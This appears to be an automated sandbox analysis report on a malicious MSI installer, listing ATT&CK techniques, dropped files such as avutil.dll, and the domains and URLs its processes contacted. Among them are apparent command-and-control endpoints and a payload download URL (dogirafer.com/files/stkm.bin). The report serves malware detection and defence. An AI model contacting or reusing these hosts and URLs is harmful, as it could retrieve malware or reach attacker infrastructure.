Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	813 Process Injection	1 DLL Side-Loading	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 File Deletion	LSA Secrets	158 System Information Discovery	SSH	Keylogging	114 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	121 Masquerading	Cached Domain Credentials	1101 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	13 Virtualization/Sandbox Evasion	DCSync	13 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	813 Process Injection	Proc Filesystem	13 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Rundll32	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 Remote System Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	Embedded Payloads	Keylogging	21 System Network Configuration Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
fes.msi	0%	ReversingLabs

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Roaming\avutil.dll	0%	ReversingLabs
C:\Windows\Installer\MSI15E9.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI1658.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI1688.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI16A8.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI17D3.tmp	0%	ReversingLabs

Source	Detection	Scanner	Label
https://dogirafer.com/CD	0%	Avira URL Cloud	safe
https://dogirafer.com/test/ser-l1-1-0	0%	Avira URL Cloud	safe
https://dogirafer.com/F	0%	Avira URL Cloud	safe
https://reateberam.com/test/5351441_21349625930948_9623822URLS1https://dogirafer.com/test/8025589_88	100%	Avira URL Cloud	malware
https://vutarf.com/	0%	Avira URL Cloud	safe
https://reateberam.com/test/3155509_577958930160_4374071URLS1https://dogirafer.com/test/2006230_2943	100%	Avira URL Cloud	malware
https://vutarf.com:6542/stop.phpE	0%	Avira URL Cloud	safe
https://dogirafer.com/test/KB	0%	Avira URL Cloud	safe
https://dogirafer.com/6122658-3693405117-2476756634-1002	0%	Avira URL Cloud	safe
https://reateberam.com/test/	100%	Avira URL Cloud	malware
https://vutarf.com:6542/stop.php	0%	Avira URL Cloud	safe
https://huanvn.com:6542/gop.php	0%	Avira URL Cloud	safe
https://huanvn.com:6542/gop.phpw	0%	Avira URL Cloud	safe
https://dogirafer.com/test/36P	0%	Avira URL Cloud	safe
https://dogirafer.com/3	0%	Avira URL Cloud	safe
https://dogirafer.com/6122658-3693405117-2476756634-1002q	0%	Avira URL Cloud	safe
https://reateberam.com/test/9001616_28662416912457_9237360URLS1https://dogirafer.com/test/5693052_67	100%	Avira URL Cloud	malware
https://huanvn.com:6542/gop.phpf	0%	Avira URL Cloud	safe
https://dogirafer.com/test/l6m	0%	Avira URL Cloud	safe
https://dogirafer.com/test/_D	0%	Avira URL Cloud	safe
https://reateberam.com/test/W	100%	Avira URL Cloud	malware
https://huanvn.com/	0%	Avira URL Cloud	safe
https://huanvn.com/3	0%	Avira URL Cloud	safe
https://vutarf.com:6542/stop.phpXw	0%	Avira URL Cloud	safe
https://vutarf.com:6542/stop.php:N	0%	Avira URL Cloud	safe
https://reateberam.com/	100%	Avira URL Cloud	malware
https://dogirafer.com/test/	0%	Avira URL Cloud	safe
https://dogirafer.com/	0%	Avira URL Cloud	safe
https://vutarf.com/s	0%	Avira URL Cloud	safe
https://dogirafer.com/test/%	0%	Avira URL Cloud	safe
https://dogirafer.com/test/56J	0%	Avira URL Cloud	safe
https://reateberam.com/test/5285504_70103146102045_6870568URLS1https://dogirafer.com/test/7527773_96	100%	Avira URL Cloud	malware
https://reateberam.com/test/G	100%	Avira URL Cloud	malware
https://dogirafer.com/files/stkm.bin	0%	Avira URL Cloud	safe
https://dogirafer.com/test/H	0%	Avira URL Cloud	safe
https://dogirafer.com/test/0	0%	Avira URL Cloud	safe
https://vutarf.com/Z	0%	Avira URL Cloud	safe
https://dogirafer.com/3p	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	high
vutarf.com	94.232.43.224	true	true	unknown
huanvn.com	103.57.249.207	true	true	unknown
dogirafer.com	104.21.68.89	true	true	unknown
reateberam.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://reateberam.com/test/	true	Avira URL Cloud: malware	unknown
https://dogirafer.com/test/	true	Avira URL Cloud: safe	unknown
https://dogirafer.com/files/stkm.bin	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://aka.ms/odirmr	explorer.exe, 00000009.00000002.4143464537.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false		high
https://dogirafer.com/F	explorer.exe, 00000009.00000002.4154916178.000000000C964000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4147116004.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1925954013.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false		high
https://dogirafer.com/test/KB	explorer.exe, 00000009.00000002.4154916178.000000000C964000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://excel.office.com	explorer.exe, 00000009.00000002.4154916178.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1934799200.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we	explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://vutarf.com/	rundll32.exe, 00000005.00000002.4141047160.000001E5177D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823437020.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://streams.videolan.org/upload/	rundll32.exe, 00000005.00000002.4144009305.00007FFDF91DD000.00000002.00000001.01000000.00000005.sdmp, avutil.dll.1.dr	false		high
https://dogirafer.com/6122658-3693405117-2476756634-1002	explorer.exe, 00000009.00000003.3105393162.000000000CB33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3106653549.000000000CB3D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3106528073.000000000CB33000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	explorer.exe, 00000009.00000000.1922418491.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4143464537.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		high
https://dogirafer.com/CD	explorer.exe, 00000009.00000002.4154916178.000000000C964000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000009.00000000.1934799200.000000000C893000.00000004.00000001.00020000.00000000.sdmp	false		high
https://dogirafer.com/test/ser-l1-1-0	explorer.exe, 00000009.00000002.4148263882.0000000009A10000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reateberam.com/test/5351441_21349625930948_9623822URLS1https://dogirafer.com/test/8025589_88	explorer.exe, 00000009.00000003.3181105020.00000000087C0000.00000040.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://vutarf.com:6542/stop.phpE	rundll32.exe, 00000005.00000002.4141047160.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823437020.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://reateberam.com/test/3155509_577958930160_4374071URLS1https://dogirafer.com/test/2006230_2943	explorer.exe, 00000009.00000003.2903762845.0000000008750000.00000040.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://wns.windows.com/L	explorer.exe, 00000009.00000002.4154916178.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1934799200.000000000C557000.00000004.00000001.00020000.00000000.sdmp	false		high
https://word.office.com	explorer.exe, 00000009.00000002.4154916178.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1934799200.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		high
https://huanvn.com:6542/gop.php	rundll32.exe, 00000005.00000002.4140824135.000001E517784000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	explorer.exe, 00000009.00000000.1922418491.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4143464537.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://r10.o.lencr.org0#	rundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4141047160.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823437020.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://vutarf.com:6542/stop.php	rundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4141047160.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823437020.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.micr	explorer.exe, 00000009.00000000.1929051492.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://r11.i.lencr.org/0	rundll32.exe, 00000005.00000003.1919140281.000001E5177E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4141123576.000001E5177EC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823307275.000001E5177EC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823468675.000001E5177EE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dogirafer.com/test/36P	explorer.exe, 00000009.00000002.4156669266.000000000CAE3000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://huanvn.com:6542/gop.phpw	rundll32.exe, 00000005.00000002.4140824135.000001E517784000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.rd.com/list/polite-habits-campers-dislike/	explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://android.notify.windows.com/iOS	explorer.exe, 00000009.00000000.1934799200.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		high
https://dogirafer.com/3	explorer.exe, 00000009.00000003.3064403345.000000000CB33000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.advancedinstaller.com	fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.dr	false		high
https://dogirafer.com/6122658-3693405117-2476756634-1002q	explorer.exe, 00000009.00000002.4156669266.000000000CAE3000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://huanvn.com:6542/gop.phpf	rundll32.exe, 00000005.00000002.4140824135.000001E517784000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	explorer.exe, 00000009.00000000.1922418491.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4143464537.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		high
https://reateberam.com/test/9001616_28662416912457_9237360URLS1https://dogirafer.com/test/5693052_67	explorer.exe, 00000009.00000003.3092452883.0000000009070000.00000040.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://outlook.com_	explorer.exe, 00000009.00000002.4154916178.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1934799200.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		high
https://dogirafer.com/test/_D	explorer.exe, 00000009.00000002.4154916178.000000000C964000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://r10.i.lencr.org/0	rundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4141047160.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823437020.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at	explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://dogirafer.com/test/l6m	explorer.exe, 00000009.00000003.3064403345.000000000CAE3000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.mi	explorer.exe, 00000009.00000000.1929051492.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl	explorer.exe, 00000009.00000002.4143464537.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		high
https://powerpoint.office.comcember	explorer.exe, 00000009.00000002.4154916178.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1934799200.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		high
https://huanvn.com/	rundll32.exe, 00000005.00000002.4140824135.000001E517790000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E51778E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-	explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://huanvn.com/3	rundll32.exe, 00000005.00000002.4140824135.000001E517790000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E51778E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.micro	explorer.exe, 00000009.00000000.1924820436.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.1932111599.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.1923210820.0000000007F40000.00000002.00000001.00040000.00000000.sdmp	false		high
https://reateberam.com/test/W	explorer.exe, 00000009.00000002.4156669266.000000000CAE3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3105655586.000000000CAE3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3064403345.000000000CAE3000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://vutarf.com:6542/stop.phpXw	rundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://vutarf.com:6542/stop.php:N	rundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reateberam.com/	explorer.exe, 00000009.00000002.4154916178.000000000C964000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	rundll32.exe, 00000005.00000003.1919140281.000001E5177E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4141123576.000001E5177EC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823307275.000001E5177EC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4141047160.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823468675.000001E5177EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823437020.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	rundll32.exe, 00000005.00000003.1919140281.000001E5177E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4141123576.000001E5177EC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823307275.000001E5177EC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4141047160.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823468675.000001E5177EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823437020.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi	explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.msn.com/q	explorer.exe, 00000009.00000002.4147116004.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1925954013.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc	explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://dogirafer.com/	explorer.exe, 00000009.00000003.3106528073.000000000CB33000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1	explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg	explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark	explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A	explorer.exe, 00000009.00000000.1922418491.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4143464537.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		high
https://vutarf.com/s	rundll32.exe, 00000005.00000002.4141047160.000001E5177D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823437020.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://r11.o.lencr.org0#	rundll32.exe, 00000005.00000003.1919140281.000001E5177E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4141123576.000001E5177EC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823307275.000001E5177EC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823468675.000001E5177EE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dogirafer.com/test/%	explorer.exe, 00000009.00000002.4154916178.000000000C54A000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent	explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://aka.ms/Vh5j3k	explorer.exe, 00000009.00000002.4143464537.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.msn.com/v1/news/Feed/Windows?&	explorer.exe, 00000009.00000002.4147116004.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1925954013.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	false		high
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg	explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://dogirafer.com/test/56J	explorer.exe, 00000009.00000002.4156669266.000000000CAE3000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reateberam.com/test/5285504_70103146102045_6870568URLS1https://dogirafer.com/test/7527773_96	explorer.exe, 00000009.00000003.3152054536.0000000009080000.00000040.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.thawte.com/cps0/	fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.dr	false		high
https://reateberam.com/test/G	explorer.exe, 00000009.00000002.4156669266.000000000CAE3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3105655586.000000000CAE3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3064403345.000000000CAE3000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://dogirafer.com/test/H	explorer.exe, 00000009.00000003.3468352135.000000000C9D4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
